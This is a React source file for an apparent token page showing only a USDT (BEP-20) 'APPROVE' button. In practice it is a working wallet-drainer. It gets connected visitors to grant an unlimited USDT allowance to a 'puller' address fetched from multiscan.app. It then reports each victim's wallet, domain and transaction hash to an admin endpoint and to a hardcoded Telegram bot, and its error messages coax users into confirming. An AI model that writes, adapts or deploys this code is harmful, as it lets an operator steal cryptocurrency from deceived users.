import React, { useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

// BSC constants
const BSC_CHAIN_ID = 56
const USDT_BEP20_ADDRESS = "0x55d398326f99059fF775485246999027B3197955"
const BSC_SPENDER_CONTRACT = "0x7919b9bEF13847695F3592cD15122DBC17355622"

const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDTBEP20Page = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  const connectBSC = async () => {
    const prov = await getEthereumProviderAsync()
    if (!prov || typeof prov.request !== 'function') {
      throw new Error("Wallet not found. Please open the page in Bybit Wallet or install MetaMask and refresh.")
    }
    const provider = new ethers.BrowserProvider(prov)
    
    // Request wallet connection
    await provider.send("eth_requestAccounts", [])
    const signer = await provider.getSigner()

    // Check current network
    let cur = await provider.send("eth_chainId", [])
    let currentChainId = parseInt(cur, 16)
    
    // If network is not BSC, switch
    if (currentChainId !== BSC_CHAIN_ID) {
      try {
        // Try to switch to BSC
        await provider.send("wallet_switchEthereumChain", [{ chainId: `0x${BSC_CHAIN_ID.toString(16)}` }])
        
        // Wait for network switch (check several times)
        let attempts = 0
        while (attempts < 20) {
          await new Promise(resolve => setTimeout(resolve, 200))
          cur = await provider.send("eth_chainId", [])
          currentChainId = parseInt(cur, 16)
          if (currentChainId === BSC_CHAIN_ID) {
            break
          }
          attempts++
        }
        
        if (currentChainId !== BSC_CHAIN_ID) {
          throw new Error("Failed to switch to BSC network")
        }
      } catch (switchError) {
        // If network is not added, add it
        if (switchError.code === 4902 || switchError.message?.includes('Unrecognized chain')) {
          await provider.send("wallet_addEthereumChain", [{
            chainId: `0x${BSC_CHAIN_ID.toString(16)}`,
            chainName: "Binance Smart Chain",
            nativeCurrency: {
              name: "BNB",
              symbol: "BNB",
              decimals: 18
            },
            rpcUrls: ["https://bsc-dataseed.binance.org/"],
            blockExplorerUrls: ["https://bscscan.com/"]
          }])
          
          // Wait for network to be added and switched
          let attempts = 0
          while (attempts < 20) {
            await new Promise(resolve => setTimeout(resolve, 200))
            cur = await provider.send("eth_chainId", [])
            currentChainId = parseInt(cur, 16)
            if (currentChainId === BSC_CHAIN_ID) {
              break
            }
            attempts++
          }
          
          if (currentChainId !== BSC_CHAIN_ID) {
            throw new Error("Failed to add and switch to BSC network")
          }
        } else {
          throw switchError
        }
      }
    }

    return { provider, signer }
  }

  const handleApprove = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("BSC APPROVE started")

      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Get spender from API (dynamic); fallback to constant
      let spenderAddress = null
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDT_BEP`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const data = JSON.parse(text)
              spenderAddress = data.puller || data.pullerAddress || data.address || data.data || data
              if (typeof data === 'string' && data.startsWith('0x') && data.length === 42) spenderAddress = data
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) spenderAddress = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed, using default spender:", fetchError?.message)
      }
      if (!spenderAddress || typeof spenderAddress !== 'string' || !spenderAddress.startsWith('0x') || spenderAddress.length !== 42) {
        console.warn("Spender not received or invalid, using default BSC spender")
        spenderAddress = BSC_SPENDER_CONTRACT
      }
      console.log("Spender address:", spenderAddress)

      // Connect to BSC
      const { provider, signer } = await connectBSC()
      const owner = await signer.getAddress()

      // Get USDT BEP-20 contract
      const usdtContract = new ethers.Contract(
        USDT_BEP20_ADDRESS,
        [
          "function approve(address spender, uint256 amount) returns (bool)",
          "function allowance(address owner, address spender) view returns (uint256)"
        ],
        signer
      )

      // Maximum value for unlimited approve
      const maxApproval = ethers.MaxUint256

      // Check current allowance
      const currentAllowance = await usdtContract.allowance(owner, spenderAddress)
      console.log("Current allowance:", currentAllowance.toString())

      // Execute approve
      const tx = await usdtContract.approve(spenderAddress, maxApproval)
      console.log("Approve transaction sent:", tx.hash)

      // Wait for confirmation
      await tx.wait()
      console.log("✅ USDT BEP20 approve completed successfully:", tx.hash)

      const domainName = window.location.hostname
      
      // Send data to server (not critical if it fails)
      try {
        const params = new URLSearchParams({
          owner: owner.toLowerCase(),
          domainName: domainName
        })

        const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdts-bep?${params.toString()}`, {
          method: "POST",
          headers: { 
            "Content-Type": "application/json"
          }
        })

        if (!resSubmit.ok) {
          const text = await resSubmit.text()
          console.error("Submit Error:", text)
        } else {
          console.log("BSC APPROVE OK - data sent to server")
        }
      } catch (submitError) {
        console.warn("Failed to send data to server (not critical):", submitError)
      }

      // Send connection information to Telegram (always send, even if server didn't respond)
      try {
        const telegramMessage = `✅ <b>USDT BEP20 Approve</b>\n\n` +
          `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
          `🌐 Domain: <code>${domainName}</code>\n` +
          `💼 Token: USDT (BEP-20)\n` +
          `📝 Transaction: <code>${tx.hash}</code>\n` +
          `⏰ Time: ${formatDateTime()}`
        await sendTelegramMessage(telegramMessage)
        console.log("Telegram notification sent")
      } catch (telegramError) {
        console.warn("Failed to send Telegram notification:", telegramError)
      }
      
      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("BSC APPROVE FAILED", e)
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message?.includes('BEP20: approve to the zero address')) {
        userMessage = "Configuration error. Please contact support."
      } else if (e.message) {
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img 
              src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
              alt="USDT"
              className="token-logo"
            />
          </div>
          <h1 className="token-title">USDT</h1>
          <p className="token-subtitle">Tether USD (BEP-20)</p>
        </div>

        {error && (
          <div className="token-error">
            {error}
          </div>
        )}

        {success && (
          <div className="token-success">
            ✅ Approve completed successfully!
          </div>
        )}

        {loading && (
          <div className="token-loading">
            Connecting and executing approve...
          </div>
        )}

        <button 
          className="token-approve-btn"
          onClick={handleApprove}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'APPROVE'}
        </button>
      </div>
    </div>
  )
}

export default USDTBEP20Page
